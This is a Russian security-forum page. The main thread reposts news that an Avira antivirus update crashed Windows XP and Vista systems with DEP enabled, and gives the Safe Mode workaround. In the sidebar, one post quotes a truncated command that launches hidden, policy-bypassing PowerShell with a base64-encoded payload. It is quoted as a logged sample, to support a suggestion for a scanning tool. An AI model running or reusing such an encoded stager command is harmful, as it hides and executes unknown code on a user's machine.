Перейти к содержанию
Иван

Антивирус Avira «парализовал» Windows XP и Vista

Recommended Posts

Иван

Обновление некоторых компонентов ядра антивируса компании Avira, присланное автоматически, привело к появлению «синего экрана смерти» на некоторых версиях Windows. Компания уже выпустила патч, который также распространяется автоматически.

Для устранения ошибки необходимо отключить модуль защиты от руткитов в «Безопасном режиме» загрузки (Safe Mode), сообщает Heise-Security.co.uk.

Как выяснили специалисты компании, аварийное завершение работы систем Windows XP и Vista, визуально — синий экран с сообщением о неустранимой ошибке, или «синий экран смерти», возникает в случае включенной функции «предотвращения выполнения данных» (Data Execution Prevention, DEP). Эта функция не дает приложениям выполнять код в памяти, помеченной как область данных. Она предназначена для защиты системы от эксплуатации уязвимостей к переполнению буфера, при которых приложение передает управление на внедренный в область данных вредоносный код.

как решать проблему - здесь

http://forum.avira.de/thread.php?postid=227725#post227725

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
4rward

Обновление некоторых компонентов ядра антивируса компании Avira, присланное автоматически, привело к появлению «синего экрана смерти» на некоторых версиях Windows. Компания уже выпустила патч, который также распространяется автоматически. Для устранения ошибки необходимо отключить модуль защиты от руткитов в «Безопасном режиме» загрузки.

Как выяснили специалисты компании, аварийное завершение работы систем Windows XP и Vista, визуально - синий экран с сообщением о неустранимой ошибке, или «синий экран смерти», возникает в случае включенной функции «предотвращения выполнения данных» (Data Execution Prevention, DEP). Эта функция не дает приложениям выполнять код в памяти, помеченной как область данных. Она предназначена для защиты системы от эксплуатации уязвимостей к переполнению буфера, при которых приложение передает управление на внедренный в область данных вредоносный код.

Cnews.ru

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Мальцев Тимофей

(озадаченно)

Эхо?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×